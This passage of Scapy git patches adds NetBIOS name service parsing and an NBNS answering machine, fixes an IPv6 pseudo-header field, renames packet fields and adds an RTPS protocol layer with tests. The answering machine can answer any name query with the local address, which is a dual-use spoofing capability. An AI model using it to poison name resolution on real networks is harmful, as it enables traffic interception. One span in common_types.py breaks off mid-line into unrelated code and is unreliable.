+bind_bottom_up(UDP, NBNSHeader, sport=137) +bind_top_down(UDP, NBNSHeader, sport=137, dport=137) + bind_layers(UDP, NBTDatagram, dport=138) bind_bottom_up(TCP, NBTSession, dport=445) @@ -301,3 +330,34 @@ def post_build(self, pkt, pay): bind_bottom_up(TCP, NBTSession, dport=139) bind_bottom_up(TCP, NBTSession, sport=139) bind_layers(TCP, NBTSession, dport=139, sport=139) + + +class NBNS_am(AnsweringMachine): + function_name = "netbios_announce" + filter = "udp port 137" + sniff_options = {"store": 0, "L2socket": conf.L3socket} + + def parse_options(self, server_name=None, ip=None): + self.ServerName = server_name + self.ip = ip + + def is_request(self, req): + return NBNSQueryRequest in req and ( + not self.ServerName or + req[NBNSQueryRequest].QUESTION_NAME.decode().strip() == + self.ServerName + ) + + def make_reply(self, req): + # type: (Packet) -> Packet + resp = AnsweringMachineUtils.reverse_packet(req) + resp[UDP].remove_payload() + address = self.ip or get_if_addr( + self.optsniff.get("iface", conf.iface)) + resp /= NBNSHeader() / NBNSQueryResponse( + RR_NAME=self.ServerName or req.QUESTION_NAME, + SUFFIX=req.SUFFIX, + ADDR_ENTRY=[NBNS_ADD_ENTRY(NB_ADDRESS=address)] + ) + resp.NAME_TRN_ID = req.NAME_TRN_ID + return resp diff --git a/test/scapy/layers/netbios.uts b/test/scapy/layers/netbios.uts index 989431452ab..dc8118ff8a6 100644 --- a/test/scapy/layers/netbios.uts +++ b/test/scapy/layers/netbios.uts @@ -6,12 +6,44 @@ ############ + Netbios tests -= NBNSQueryRequest - build += NBNSQueryRequest - build & dissect -z = NBNSQueryRequest(SUFFIX="file server service", QUESTION_NAME='TEST1', QUESTION_TYPE='NB') +z = NBNSHeader()/NBNSQueryRequest(SUFFIX="file server service", QUESTION_NAME='TEST1', QUESTION_TYPE='NB') assert raw(z) == b'\x00\x00\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00 FEEFFDFEDBCACACACACACACACACACACA\x00\x00 \x00\x01' pkt = IP(dst='192.168.0.255')/UDP(sport=137, dport='netbios_ns')/z pkt = IP(raw(pkt)) -assert pkt.QUESTION_NAME == b'TEST1 ' \ No newline at end of file +assert pkt.QUESTION_NAME == b'TEST1 ' + +assert NBNSQueryRequest in NBNSHeader(raw(z)) + += NBNSQueryResponse - build & dissect + +z = NBNSHeader()/NBNSQueryResponse(RR_NAME="FRED", ADDR_ENTRY=[NBNS_ADD_ENTRY(NB_ADDRESS="192.168.0.13")]) + +assert raw(z) == b'\x00\x00\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00 EGFCEFEECACACACACACACACACACACAAA\x00\x00 \x00\x01\x00\x04\x93\xe0\x00\x06\x00\x00\xc0\xa8\x00\r' +pkt = NBNSHeader(raw(z)) +assert NBNSQueryResponse in pkt +assert pkt.ADDR_ENTRY[0].NB_ADDRESS == "192.168.0.13" + += NBNSNodeStatusResponse - build & dissect + +z = NBNSHeader()/NBNSNodeStatusResponse(NODE_NAME=[NBNSNodeStatusResponseService(NETBIOS_NAME="WINDOWS")], MAC_ADDRESS="aa:aa:aa:aa:aa:aa") +assert raw(z) == b'\x00\x00\x84\x00\x00\x00\x00\x01\x00\x00\x00\x00 HHGJGOGEGPHHHDCACACACACACACACAAA\x00\x00!\x00\x01\x00\x00\x00\x00\x00S\x01WINDOWS\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +pkt = NBNSHeader(raw(z)) +assert pkt.NODE_NAME[0].NETBIOS_NAME == b'WINDOWS\x00\x00\x00\x00\x00\x00\x00\x00\x00' +assert NBNSNodeStatusResponse in pkt + += NBNSWackResponse - build & dissect + +z = NBNSHeader()/NBNSWackResponse(RR_NAME="SARAH") +assert raw(z) == b'\x00\x00\xbc\x00\x00\x00\x00\x01\x00\x00\x00\x00 FDEBFCEBEICACACACACACACACACACAAA\x00\x00 \x00\x01\x00\x00\x00\x02\x00\x02)\x10' +pkt = NBNSHeader(raw(z)) +assert pkt[NBNSWackResponse].RR_NAME == b'SARAH ' + += NBTSession + +z = raw(TCP()/NBTSession()) +assert z == b'\x00\x8b\x00\x8b\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x00\x00\x00\x00\x00\x00\x00\x00' +assert NBTSession in TCP(z) \ No newline at end of file From 6c7c35f00a4afc1b4ed7cccf33b54615bbe179bc Mon Sep 17 00:00:00 2001 From: Leonard Crestez Date: Sat, 27 Nov 2021 12:19:20 +0200 Subject: [PATCH 0697/1632] inet6: Fix PseudoIPv6 uplen being only 16 bits (#3427) * Add test for PseudoIPv6 specifically Signed-off-by: Leonard Crestez * Add test for in6_chksum via build/parse of UDP Signed-off-by: Leonard Crestez * inet6: Fix PseudoIPv6 uplen being only 16 bits According to RFC2460 the payload length in the ipv6 pseudoheader is 32bits. Nobody noticed so far likely because this is only used for computing 16-bit checksum. Signed-off-by: Leonard Crestez --- scapy/layers/inet6.py | 2 +- test/scapy/layers/inet6.uts | 8 ++++++++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 78e6739b464..19f882e6334 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -554,7 +554,7 @@ class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation name = "Pseudo IPv6 Header" fields_desc = [IP6Field("src", "::"), IP6Field("dst", "::"), - ShortField("uplen", None), + IntField("uplen", None), BitField("zero", 0, 24), ByteField("nh", 0)] diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 6483a5f2f0c..adaab6343ac 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -51,6 +51,14 @@ GRE in p and p[GRE:1].proto == 0x6558 and p[GRE:2].proto == 0x86DD and IPv6 in p = IPv6 ma_addr coverage on hashret IPv6(dst="ff00::1:ff28:9c5a", src="::").hashret() == b';' += PseudoIPv6 +p = PseudoIPv6(src="fd00::abcd", dst="fd00::1234", uplen=64, nh=socket.IPPROTO_UDP) +raw(p) == b"\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xab\xcd\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x34\x00\x00\x00\x40\x00\x00\x00\x11" + += in6_chksum is computed on UDP or TCP build +p = IPv6(raw(IPv6()/UDP()/Raw(load="somedata"))) +assert p.chksum == 0x45cb + ########### IPv6ExtHdrRouting Class ########################### = IPv6ExtHdrRouting Class - No address - build From bb4ed5ad45089fc6a19e4a3e53d1408b26841838 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 13 Oct 2021 13:47:58 +0200 Subject: [PATCH 0698/1632] More injection of signatures --- scapy/ansmachine.py | 14 +++++++++----- scapy/automaton.py | 8 ++++++++ scapy/base_classes.py | 14 ++++++++++++++ scapy/contrib/cdp.py | 2 +- scapy/contrib/gtp.py | 2 +- scapy/contrib/gtp_v2.py | 10 +++++----- scapy/contrib/opc_da.py | 4 ++-- scapy/contrib/pnio_rpc.py | 4 ++-- scapy/contrib/rsvp.py | 2 +- .../scada/iec104/iec104_information_elements.py | 8 ++++---- scapy/layers/ir.py | 16 ++++++++-------- scapy/layers/smb2.py | 2 +- 12 files changed, 56 insertions(+), 30 deletions(-) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 685ebf704ee..dabb017f7ba 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -45,16 +45,20 @@ def __new__(cls, # type: ignore ): # type: (...) -> Type['AnsweringMachine[_T]'] obj = super(ReferenceAM, cls).__new__(cls, name, bases, dct) + try: + import inspect + obj.__signature__ = inspect.signature( # type: ignore + obj.parse_options # type: ignore + ) + except (ImportError, AttributeError): + pass if obj.function_name: # type: ignore func = lambda obj=obj, *args, **kargs: obj(*args, **kargs)() # type: ignore # noqa: E501 # Inject signature func.__qualname__ = obj.function_name # type: ignore try: - import inspect - func.__signature__ = inspect.signature( # type: ignore - obj.parse_options # type: ignore - ) - except (ImportError, AttributeError): + func.__signature__ = obj.__signature__ # type: ignore + except (AttributeError): pass globals()[obj.function_name] = func # type: ignore return obj diff --git a/scapy/automaton.py b/scapy/automaton.py index d53e1726156..fa1875ded20 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -605,6 +605,14 @@ def __new__(cls, name, bases, dct): # type: ignore ioev.atmt_as_supersocket, ioev.atmt_ioname, cast(Type["Automaton"], cls))) + + # Inject signature + try: + import inspect + cls.__signature__ = inspect.signature(cls.parse_args) # type: ignore # noqa: E501 + except (ImportError, AttributeError): + pass + return cast(Type["Automaton"], cls) def build_graph(self): diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 623324727b6..84e771b95a9 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -337,6 +337,20 @@ def __new__(cls, # type: ignore dct["_%s" % attr] = dct.pop(attr) except KeyError: pass + # Build and inject signature + try: + # Py3 only + import inspect + dct["__signature__"] = inspect.Signature([ + inspect.Parameter("_pkt", inspect.Parameter.POSITIONAL_ONLY), + ] + [ + inspect.Parameter(f.name, + inspect.Parameter.KEYWORD_ONLY, + default=f.default) + for f in dct["fields_desc"] + ]) + except (ImportError, AttributeError, KeyError): + pass newcls = type.__new__(cls, name, bases, dct) # Note: below can't be typed because we use attributes # created dynamically.. diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index fa1165387fa..3caf0ff86ae 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -303,7 +303,7 @@ class CDPMsgVoIPVLANReply(CDPMsgGeneric): name = "VoIP VLAN Reply" fields_desc = [XShortEnumField("type", 0x000e, _cdp_tlv_types), ShortField("len", 7), - ByteField("status?", 1), + ByteField("status", 1), ShortField("vlan", 1)] diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 108fdf0d87c..42bcb589038 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -873,7 +873,7 @@ class IE_PrivateExtension(IE_Base): name = "Private Extension" fields_desc = [ByteEnumField("ietype", 255, IEType), ShortField("length", 1), - ByteField("extension identifier", 0), + ByteField("extension_identifier", 0), StrLenField("extention_value", "", length_from=lambda x: x.length)] diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index dfc8e5bcb57..bdd0c9d0a7e 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -890,11 +890,11 @@ class IE_Indication(gtp.IE_Base): ConditionalField( BitField("WPMSI", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("5GSNN26", 0, 1), lambda pkt: pkt.length > 6), + BitField("_5GSNN26", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( BitField("REPREFI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("5GSIWKI", 0, 1), lambda pkt: pkt.length > 6), + BitField("_5GSIWKI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( BitField("EEVRSI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( @@ -914,11 +914,11 @@ class IE_Indication(gtp.IE_Base): ConditionalField( BitField("N5GNMI", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("5GCNRS", 0, 1), lambda pkt: pkt.length > 7), + BitField("_5GCNRS", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("5GCNRI", 0, 1), lambda pkt: pkt.length > 7), + BitField("_5GCNRI", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("5SRHOI", 0, 1), lambda pkt: pkt.length > 7), + BitField("_5SRHOI", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( BitField("ETHPDN", 0, 1), lambda pkt: pkt.length > 7), diff --git a/scapy/contrib/opc_da.py b/scapy/contrib/opc_da.py index 469a199ee34..80261bc03fe 100644 --- a/scapy/contrib/opc_da.py +++ b/scapy/contrib/opc_da.py @@ -721,8 +721,8 @@ def extract_padding(self, p): class OpcDaAuth3(Packet): name = "Auth3" fields_desc = [ - ShortField('code?', 5840), - ShortField('code2?', 5840), + ShortField('code', 5840), + ShortField('code2', 5840), ByteField('authType', 10), ByteField('authLevel', 2), ByteField('authPadLen', 0), diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index 6a75e7ffd7b..c724638f238 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -1170,14 +1170,14 @@ def __new__(cls, name, bases, dct): class Alarm_Low(Packet): fields_desc = [ PNIORealTimeAcyclicPDUHeader, - PacketField("RTA-SDU", None, AlarmNotification_Low), + PacketField("RTA_SDU", None, AlarmNotification_Low), ] class Alarm_High(Packet): fields_desc = [ PNIORealTimeAcyclicPDUHeader, - PacketField("RTA-SDU", None, AlarmNotification_High), + PacketField("RTA_SDU", None, AlarmNotification_High), ] diff --git a/scapy/contrib/rsvp.py b/scapy/contrib/rsvp.py index a720826bde3..c6cfd9d5390 100644 --- a/scapy/contrib/rsvp.py +++ b/scapy/contrib/rsvp.py @@ -137,7 +137,7 @@ class RSVP_Object(Packet): name = "RSVP_Object" fields_desc = [ShortField("Length", 4), ByteEnumField("Class", 0x01, rsvptypes), - ByteField("C-Type", 1)] + ByteField("C_Type", 1)] def guess_payload_class(self, payload): if self.Class == 0x03: diff --git a/scapy/contrib/scada/iec104/iec104_information_elements.py b/scapy/contrib/scada/iec104/iec104_information_elements.py index e8249997527..dcaddb487d2 100644 --- a/scapy/contrib/scada/iec104/iec104_information_elements.py +++ b/scapy/contrib/scada/iec104/iec104_information_elements.py @@ -489,7 +489,7 @@ class IEC104_IE_QOC: } informantion_element_fields = [ - BitEnumField('s/e', 0, 1, SE_FLAGS), + BitEnumField('s_or_e', 0, 1, SE_FLAGS), BitEnumField('qu', 0, 5, QU_FLAGS) ] @@ -613,7 +613,7 @@ class IEC104_IE_CP56TIME2A(IEC104_IE_CommonQualityFlags): BitField('reserved_2', 0, 2), BitField('hours', 0, 5), BitEnumField('weekday', 0, 3, WEEK_DAY_FLAGS), - BitField('day-of-month', 0, 5), + BitField('day_of_month', 0, 5), BitField('reserved_3', 0, 4), BitField('month', 0, 4), BitField('reserved_4', 0, 1), @@ -638,7 +638,7 @@ class IEC104_IE_CP56TIME2A_START_TIME(IEC104_IE_CP56TIME2A): BitField('start_hours', 0, 5), BitEnumField('start_weekday', 0, 3, IEC104_IE_CP56TIME2A.WEEK_DAY_FLAGS), - BitField('start_day-of-month', 0, 5), + BitField('start_day_of_month', 0, 5), BitField('start_reserved_3', 0, 4), BitField('start_month', 0, 4), BitField('start_reserved_4', 0, 1), @@ -663,7 +663,7 @@ class IEC104_IE_CP56TIME2A_STOP_TIME(IEC104_IE_CP56TIME2A): BitField('stop_hours', 0, 5), BitEnumField('stop_weekday', 0, 3, IEC104_IE_CP56TIME2A.WEEK_DAY_FLAGS), - BitField('stop_day-of-month', 0, 5), + BitField('stop_day_of_month', 0, 5), BitField('stop_reserved_3', 0, 4), BitField('stop_month', 0, 4), BitField('stop_reserved_4', 0, 1), diff --git a/scapy/layers/ir.py b/scapy/layers/ir.py index c25fc0852c5..f8b77b46a2a 100644 --- a/scapy/layers/ir.py +++ b/scapy/layers/ir.py @@ -25,19 +25,19 @@ class IrLAPHead(Packet): class IrLAPCommand(Packet): name = "IrDA Link Access Protocol Command" fields_desc = [XByteField("Control", 0), - XByteField("Format identifier", 0), - XIntField("Source address", 0), - XIntField("Destination address", 0xffffffff), - XByteField("Discovery flags", 0x1), - ByteEnumField("Slot number", 255, {"final": 255}), + XByteField("Format_identifier", 0), + XIntField("Source_address", 0), + XIntField("Destination_address", 0xffffffff), + XByteField("Discovery_flags", 0x1), + ByteEnumField("Slot_number", 255, {"final": 255}), XByteField("Version", 0)] class IrLMP(Packet): name = "IrDA Link Management Protocol" - fields_desc = [XShortField("Service hints", 0), - XByteField("Character set", 0), - StrField("Device name", "")] + fields_desc = [XShortField("Service_hints", 0), + XByteField("Character_set", 0), + StrField("Device_name", "")] bind_layers(CookedLinux, IrLAPHead, proto=23) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 03dcf91a307..fa959b0100b 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -117,7 +117,7 @@ class SMB2_Compression_Transform_Header(Packet): 0x0000: "SMB2_COMPRESSION_FLAG_NONE", 0x0001: "SMB2_COMPRESSION_FLAG_CHAINED", }), - XLEIntField("Offset/Length", 0), + XLEIntField("Offset_or_Length", 0), ] From 6cba1a55f72f3f0307463c8fd253695aee12196f Mon Sep 17 00:00:00 2001 From: Federico Maggi Date: Mon, 29 Nov 2021 12:19:56 +0100 Subject: [PATCH 0699/1632] RTPS contrib layer (#3403) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * RTPS contrib layer Check this branch for detailed history of this change: https://github.com/phretor/scapy/commits/rtps Co-authored-by: Federico Maggi Co-authored-by: Víctor Mayoral Vilches Signed-off-by: Federico Maggi * Update scapy/contrib/rtps/pid_types.py Co-authored-by: Víctor Mayoral Vilches * Update scapy/contrib/rtps/rtps.py Co-authored-by: gpotter2 * Fixing various flake8 and docs build issues Signed-off-by: Federico Maggi * codespell: endianess ==> endianness Signed-off-by: Federico Maggi * Turn multiple duplicated 'reserved' bit fields into one Previous EndpointFlagsPacket definition led to the following syntax warning: SyntaxWarning: Packet 'EndpointFlagsPacket' has a duplicated 'reserved' field ! If you are using several ConditionalFields, have a look at MultipleTypeField instead! This will become a SyntaxError in a future version of Scapy. This patch turns the various 'reserved' fields into a single one with length 4 bits. Signed-off-by: Víctor Mayoral Vilches * Remove duplicated scapy metadata, into __init__.py Signed-off-by: Víctor Mayoral Vilches * Add RTPS PID type definitions to RTPS default imports This way, scripts don't need to manually import this file Signed-off-by: Víctor Mayoral Vilches * Define endianness of PIDPacketBase class This leads to packages like PID_BUILTIN_ENDPOINT_QOS building upon PIDPacketBase to have a proper alignment. Additions to rtps.uts RTPS layer test campaign to test this type of bit alignment issues Signed-off-by: Víctor Mayoral Vilches * Handle else in e_flags to avoid None errors Crafting packages directly from raw hex data led to 'contrib/rtps/common_types.py, line 151, in set_endianness assert self.endianness is not None' type errors. By providing an else and returning FORMAT_BE, we mitigate it Signed-off-by: Víctor Mayoral Vilches * Fix endianness of parameterId and parameterLength in RTPSParameterIdTypes Various packages inheriting from PIDPacketBase and part of RTPSParameterIdTypes were using Big Endian incorrectly, when Little Endian is what's used by DDS implementations. Signed-off-by: Víctor Mayoral Vilches * Add Alias's credit in files modified Signed-off-by: Víctor Mayoral Vilches * - Replaced `ByteField` with `StrField` - `_next_cls_cb` is now a plain function - Test cases updated accordingly - Removed `types.py` Signed-off-by: Federico Maggi * Fixing flake8 failures + contrib line Signed-off-by: Federico Maggi * Polishing and formatting fixes Signed-off-by: Federico Maggi * - Removed unused classes - Changed asserts into warnings + defaults Signed-off-by: Federico Maggi * Re-work scapy's preamble Signed-off-by: Víctor Mayoral Vilches * Using longs where applicable Signed-off-by: Federico Maggi * Minor code health fixes Co-authored-by: Víctor Mayoral Vilches Co-authored-by: gpotter2 --- scapy/contrib/rtps/__init__.py | 25 ++ scapy/contrib/rtps/common_types.py | 310 +++++++++++++++ scapy/contrib/rtps/pid_types.py | 599 +++++++++++++++++++++++++++++ scapy/contrib/rtps/rtps.py | 516 +++++++++++++++++++++++++ test/contrib/rtps/rtps.uts | 165 ++++++++ 5 files changed, 1615 insertions(+) create mode 100644 scapy/contrib/rtps/__init__.py create mode 100644 scapy/contrib/rtps/common_types.py create mode 100644 scapy/contrib/rtps/pid_types.py create mode 100644 scapy/contrib/rtps/rtps.py create mode 100644 test/contrib/rtps/rtps.uts diff --git a/scapy/contrib/rtps/__init__.py b/scapy/contrib/rtps/__init__.py new file mode 100644 index 00000000000..da35986d343 --- /dev/null +++ b/scapy/contrib/rtps/__init__.py @@ -0,0 +1,25 @@ +""" +Real-Time Publish-Subscribe Protocol (RTPS) dissection + +Copyright (C) 2021 Trend Micro Incorporated + +This program is free software; you can redistribute it and/or modify it under +the terms of the GNU General Public License as published by the Free Software +Foundation; either version 2 of the License, or (at your option) any later +version. + +This program is distributed in the hope that it will be useful, but WITHOUT ANY +WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A +PARTICULAR PURPOSE. See the GNU General Public License for more details. + +You should have received a copy of the GNU General Public License along with +this program; if not, write to the Free Software Foundation, Inc., 51 Franklin +Street, Fifth Floor, Boston, MA 02110-1301, USA. +""" + +# scapy.contrib.description = Real-Time Publish-Subscribe Protocol (RTPS) +# scapy.contrib.status = loads +# scapy.contrib.name = rtps + +from scapy.contrib.rtps.rtps import * # noqa F403,F401 +from scapy.contrib.rtps.pid_types import * # noqa F403,F401 diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py new file mode 100644 index 00000000000..fc5dbc49fb2 --- /dev/null +++ b/scapy/contrib/rtps/common_types.py @@ -0,0 +1,310 @@ +""" +Real-Time Publish-Subscribe Protocol (RTPS) dissection + +Copyright (C) 2021 Trend Micro Incorporated +Copyright (C) 2021 Alias Robotics S.L. + +This program is free software; you can redistribute it and/or modify it under +the terms of the GNU General Public License as published by the Free Software +Foundation; either version 2 of the License, or (at your option) any later +version. + +This program is distributed in the hope that it will be useful, but WITHOUT ANY +WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A +PARTICULAR PURPOSE. See the GNU General Public License for more details. + +You should have received a copy of the GNU General Public License along with +this program; if not, write to the Free Software Foundation, Inc., 51 Franklin +Street, Fifth Floor, Boston, MA 02110-1301, USA. +""" + +# scapy.contrib.description = RTPS common types +# scapy.contrib.status = library + +import struct +import warnings + +from scapy.fields import ( + BitField, + EnumField, + ByteField, + IntField, + IPField, + LEIntField, + PacketField, + ReversePadField, + StrField, + StrLenField, + XIntField, +) +from scapy.packet import Packet, fuzz + +FORMAT_LE = "<" +FORMAT_BE = ">" +STR_MAX_LEN = 8192 +DEFAULT_ENDIANESS = FORMAT_LE + + +def is_le(pkt): + if hasattr(pkt, "submessageFlags"): + end = pkt.submessageFlags & 0b000000001 == 0b000000001 + return end + + return False + + +def e_flags(pkt: Packet) -> str: + if is_le(pkt): + return FORMAT_LE + else: + return FORMAT_BE + + +class EField(object): + """ + A field that manages endianness of a nested field passed to the constructor + """ + + __slots__ = ["fld", "endianness", "endianness_from"] + + def __init__(self, fld, endianness=FORMAT_BE, endianness_from=e_flags): + self.fld = fld + self.endianness = endianness + self.endianness_from = endianness_from + + def set_endianness(self, pkt): + if getattr(pkt, "endianness", None) is not None: + self.endianness = pkt.endianness + elif self.endianness_from is not None: + self.endianness = self.endianness_from(pkt) + + if hasattr(self.fld, "set_endianness"): + self.fld.set_endianness(endianness=self.endianness) + return + + if hasattr(self.fld, "endianness"): + self.fld.endianness = self.endianness + return + + if isinstance(self.endianness, str) and self.endianness: + if hasattr(self.fld, "fmt"): + if len(self.fld.fmt) == 1: # if it's only "I" + _end = self.fld.fmt[0] + else: # if it's " Optional[Packet_metaclass]: + + if hasattr(pkt, "endianness"): + endianness = pkt.endianness + else: + endianness = e_flags(pkt) + + _id = struct.unpack(endianness + "h", remain[0:2])[0] + + if _id == 0x0001: # sentinel + return None + + next_cls = _RTPSParameterIdTypes.get(_id, PID_UNKNOWN) + + if next_cls is None: + return None + + next_cls.endianness = endianness + + return next_cls + + +class ParameterListPacket(EPacket): + name = "PID list" + fields_desc = [ + PacketListField("parameterValues", [], next_cls_cb=get_pid_class), + PacketField("sentinel", "", PID_SENTINEL), + ] diff --git a/scapy/contrib/rtps/rtps.py b/scapy/contrib/rtps/rtps.py new file mode 100644 index 00000000000..8239369edf2 --- /dev/null +++ b/scapy/contrib/rtps/rtps.py @@ -0,0 +1,516 @@ +""" +Real-Time Publish-Subscribe Protocol (RTPS) dissection + +Copyright (C) 2021 Trend Micro Incorporated +Copyright (C) 2021 Alias Robotics S.L. + +This program is free software; you can redistribute it and/or modify it under +the terms of the GNU General Public License as published by the Free Software +Foundation; either version 2 of the License, or (at your option) any later +version. + +This program is distributed in the hope that it will be useful, but WITHOUT ANY +WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A +PARTICULAR PURPOSE. See the GNU General Public License for more details. + +You should have received a copy of the GNU General Public License along with +this program; if not, write to the Free Software Foundation, Inc., 51 Franklin +Street, Fifth Floor, Boston, MA 02110-1301, USA. +""" + +# scapy.contrib.description = RTPS abstractions +# scapy.contrib.status = library + +import struct +from typing import List, Optional + +from scapy.base_classes import Packet_metaclass +from scapy.fields import ( + ConditionalField, + IntField, + PacketField, + PacketListField, + ShortField, + StrField, + StrFixedLenField, + StrLenField, + X3BytesField, + XByteField, + XIntField, + XLongField, + XNBytesField, + XShortField, + XStrLenField, + FlagsField, + Field, + EnumField, +) +from scapy.packet import Packet, bind_layers + +from scapy.contrib.rtps.common_types import ( + EField, + EPacket, + EPacketField, + InlineQoSPacketField, + ProtocolVersionPacket, + DataPacketField, + STR_MAX_LEN, + SerializedDataField, + VendorIdPacket, +) +from scapy.contrib.rtps.pid_types import ParameterListPacket, get_pid_class + + +_rtps_reserved_entity_ids = { + b"\x00\x00\x00\x00": "ENTITY_UNKNOWN", + b"\x00\x00\x01\xc1": "ENTITYID_PARTICIPANT", + b"\x00\x00\x02\xc2": "ENTITYID_SEDP_BUILTIN_TOPIC_WRITER", + b"\x00\x00\x02\xc7": "ENTITYID_SEDP_BUILTIN_TOPIC_READER", + b"\x00\x00\x03\xc2": "ENTITYID_SEDP_BUILTIN_PUBLICATIONS_WRITER", + b"\x00\x00\x03\xc7": "ENTITYID_SEDP_BUILTIN_PUBLICATIONS_READER", + b"\x00\x00\x04\xc2": "ENTITYID_SEDP_BUILTIN_SUBSCRIPTIONS_WRITER", + b"\x00\x00\x04\xc7": "ENTITYID_SEDP_BUILTIN_SUBSCRIPTIONS_READER", + b"\x00\x01\x00\xc2": "ENTITYID_SPDP_BUILTIN_PARTICIPANT_WRITER", + b"\x00\x01\x00\xc7": "ENTITYID_SPDP_BUILTIN_PARTICIPANT_READER", + b"\x00\x02\x00\xc2": "ENTITYID_P2P_BUILTIN_PARTICIPANT_MESSAGE_WRITER", + b"\x00\x02\x00\xc7": "ENTITYID_P2P_BUILTIN_PARTICIPANT_MESSAGE_READER", +} + + +class GUIDPrefixPacket(Packet): + name = "RTPS GUID Prefix" + fields_desc = [ + XIntField("hostId", 0), + XIntField("appId", 0), + XIntField("instanceId", 0), + ] + + def extract_padding(self, p): + return b"", p + + +class RTPS(Packet): + """ + RTPS package, overall structure as per DDSI-RTPS v2.3, section 9.4.1 + The structure is also discussed at 8.3.3. + + The wire representation (bits) is as follows: + + 0...2...........7...............15.............23.............. 31 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Header (RTPSHeader) | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Submessage (RTPSSubmessage) | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + ................................................................. + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Submessage | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + For representation purposes, this package will only contain the header + and other submessages will be bound as layers (bind_layers): + + RTPS Header structure as per DDSI-RTPS v2.3, section 9.4.4 + The wire representation (bits) is as follows: + + 0...2...........7...............15.............23...............31 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | 'R' | 'T' | 'P' | 'S' | + +---------------+---------------+---------------+---------------+ + | ProtocolVersion version | VendorId vendorId | + +---------------+---------------+---------------+---------------+ + | | + + + + | GuidPrefix guidPrefix | + + + + | | + +---------------+---------------+---------------+---------------+ + + References: + + * https://community.rti.com/static/documentation/wireshark/current/doc/understanding_rtps.html # noqa E501 + * https://www.omg.org/spec/DDSI-RTPS/2.3/PDF + * https://www.wireshark.org/docs/dfref/r/rtps.html + """ + + name = "RTPS Header" + fields_desc = [ + StrFixedLenField("magic", b"", 4), + PacketField( + "protocolVersion", ProtocolVersionPacket(), ProtocolVersionPacket), + PacketField( + "vendorId", VendorIdPacket(), VendorIdPacket), + PacketField( + "guidPrefix", GUIDPrefixPacket(), GUIDPrefixPacket), + ] + + +class InlineQoSPacket(EPacket): + name = "Inline QoS" + + fields_desc = [ + PacketListField("parameters", [], next_cls_cb=get_pid_class), + ] + + +class ParticipantMessageDataPacket(EPacket): + name = "Participant Message Data" + fields_desc = [ + PacketField("guidPrefix", "", GUIDPrefixPacket), + XIntField("kind", 0), + EField(XIntField("sequenceSize", 0)), # octets + StrLenField( + "serializedData", + "", + length_from=lambda x: x.sequenceSize * 4, + max_length=STR_MAX_LEN, + ), + ] + + +class DataPacket(EPacket): + name = "Data Packet" + _pl_type = None + _pl_len = 0 + + fields_desc = [ + XShortField("encapsulationKind", 0), + XShortField("encapsulationOptions", 0), + # if payload 